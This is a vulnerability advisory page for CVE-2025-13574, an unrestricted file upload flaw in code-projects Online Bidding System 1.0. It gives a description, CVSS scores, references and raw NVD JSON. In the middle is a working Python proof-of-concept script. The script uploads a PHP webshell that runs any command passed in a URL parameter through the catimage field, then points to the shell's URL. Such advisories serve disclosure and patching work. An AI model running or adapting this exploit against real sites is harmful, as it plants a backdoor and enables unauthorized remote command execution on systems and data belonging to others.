CVE-2025-13574

Description

A weakness has been identified in code-projects Online Bidding System 1.0. This issue affects the function categoryadd of the file /administrator/addcategory.php. This manipulation of the argument catimage causes unrestricted upload. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:online_bidding_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Bidding System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13574 PoC - Online Bidding System 1.0 Unrestricted File Upload
# Target: /administrator/addcategory.php
# Vulnerability: catimage parameter allows arbitrary file upload

def exploit(target_url, admin_path='/administrator/addcategory.php'):
    """
    Exploit for CVE-2025-13574
    Upload a PHP webshell via the vulnerable catimage parameter
    """
    
    # PHP webshell payload
    webshell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'
    
    # Prepare multipart form data
    files = {
        'catimage': ('shell.php', webshell, 'application/x-php')
    }
    
    # Additional required fields (may vary based on application)
    data = {
        'categoryadd': '1',  # Trigger the categoryadd function
        'catname': 'TestCategory'  # Category name parameter
    }
    
    try:
        # Send the malicious upload request
        response = requests.post(target_url + admin_path, files=files, data=data, timeout=10)
        
        if response.status_code == 200:
            print('[+] File upload request sent successfully')
            print('[+] Check if shell was uploaded to the uploads directory')
            print('[+] Access shell at: ' + target_url + '/uploads/shell.php?cmd=whoami')
        else:
            print('[-] Upload failed with status code:', response.status_code)
            
    except requests.exceptions.RequestException as e:
        print('[-] Error:', str(e))

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve_2025_13574.py <target_url>')
        print('Example: python cve_2025_13574.py http://target.com')
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13574
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13574
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13574/
[4] VulDB https://vuldb.com/cve/CVE-2025-13574
[5] https://code-projects.org/
[6] https://github.com/Yohane-Mashiro/cve/blob/main/upload%201.md
[7] https://vuldb.com/?ctiid.333338
[8] https://vuldb.com/?id.333338
[9] https://vuldb.com/?submit.698717
[10] https://vuldb.com/?submit.698718

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13574", "sourceIdentifier": "[email protected]", "published": "2025-11-24T00:15:46.287", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects Online Bidding System 1.0. This issue affects the function categoryadd of the file /administrator/addcategory.php. This manipulation of the argument catimage causes unrestricted upload. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_bidding_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "41FE5C5F-8DE9-41F0-B9AA-29EBE2BC199C"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Yohane-Mashiro/cve/blob/main/upload%201.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333338", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333338", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.698717", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.698718", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}